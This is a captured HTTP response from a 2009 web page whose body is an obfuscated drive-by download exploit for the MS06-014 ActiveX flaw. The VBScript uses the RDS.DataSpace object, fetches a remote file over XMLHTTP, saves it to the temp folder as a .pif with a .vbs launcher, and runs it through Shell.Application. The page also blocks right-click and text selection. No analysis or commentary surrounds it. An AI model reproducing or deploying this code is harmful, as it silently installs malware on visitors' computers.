HTTP/1.1 200 OK
Content-Length: 2679
ETag: "0fb6466e97c91:60b"
Date: Wed, 25 Feb 2009 09:31:39 GMT
Last-Modified: Wed, 25 Feb 2009 06:00:46 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.ljsl4l.cn/a1/MS06014.htm
X-Polipo-Date: Wed, 25 Feb 2009 09:42:26 GMT
X-Polipo-Access: Wed, 25 Feb 2009 09:43:56 GMT

<script src="06014.js"></script>
<script language=VBScript>
On Error Resume Next
vi = "v":vfi = "vv"
gameeeid="clsid:"
gameeeidx="BD"
gameeeid4="56-6"
gameeeid6="3-1"
gameeeid8="0-98"
set gameee_2_cn = document.createElement("object")
gameeeid12="29E"
gameeeid9="3A-0"
gameeeID13="36"
gameeeid5="5A"
gameeeid7="1D"
gameeeid3="C5"
gameeeid11="4FC"
gameeeid10="0C0"
gameeeid2="96"
dadong="classid"
gameee3="Micro"
gameee6="E"
gameee4="soft.XM"
giceeee="LHTTp"
gameee5="G"
gameee7="T"
gameee_2_cn.SetAttribute dadong,  gameeeid&gameeeidx&gameeeid2&gameeeid3&gameeeid4&gameeeid5&gameeeid6&gameeeid7&gameeeid8&gameeeid9&gameeeid10&gameeeid11&gameeeid12&gameeeID13
fuckassdf="c"
Set lovegameee=gameee_2_cn.CreateObject(gameee3&gameee4&giceeee,"")
lovegameee.Open gameee5&gameee6&gameee7, gameee, False
lovegameee.Send
gameee_kiteggggggggg="GameeeEeee.pif"
gameee_kitegggggggggs="Gameeeeeee.vbs"
Q123456s="FileSyst"
Q123456sssx="b.stream"
Q123456="Scripting."
Q123456sss="Adod"
Q123456ss="emObject"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = gameee_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
gameeeuser="chilam"
gameee_kiteggggggggg=chilam.BuildPath(yingying,gameee_kiteggggggggg)
gameee_kitegggggggggs=chilam.BuildPath(yingying,gameee_kitegggggggggs)
Set chilams = gameee_2_cn.createobject(Q123456sssss,"")
Set dncj = lovegameee
chilams.type=1
chilams.Open
chilams.Write dncj.ResponseBody	
</scripT><script language="JavaScript">
chilams["Savetofile"](GameEe_kiteggggggggg,2);
</script><script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText  "'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Set Love_gameee = CreateObject(""Wscript"&".Shell"")"&"'I LOVE gameee TEAM"&vBCrLf&"'I LOVE gomeee TEAM"&"'i LOVE gomeee TEAM"&vbCrLf&"Love_gameee.run ("""&GameEe_kiteggggggggg&""")"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"
chilams.Savetofile GameEe_kitegggggggggs,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
gameeedk="O"
gameeedks="p"
gameeedkss="e"
gameeedksss="n"
nurewg="cccc"
Set cute_qq_cn_qq_123456 = gameee_2_cn.createobject(www&cute&qq&cn&kfqq, "")
Set xxxxxxxxxxxxqqqqqqqq = gameee_2_cn.createobject(www&cute&qq&cn&kfqq, "")
xxxxxxxxxxxxqqqqqqqq.ShellExeCute GameEe_kitegggggggggs, "", "", gameeedk&gameeedks&gameeedkss&gameeedksss, 0
</script><script type="text/jscript">function init() { document.write("");}window.onload = init;document.write("");</script>
<br><Br><br><br><br><br><br><br><br>
<body ondragstart="return false" onselectstart="return false" oncontextmenu="return false">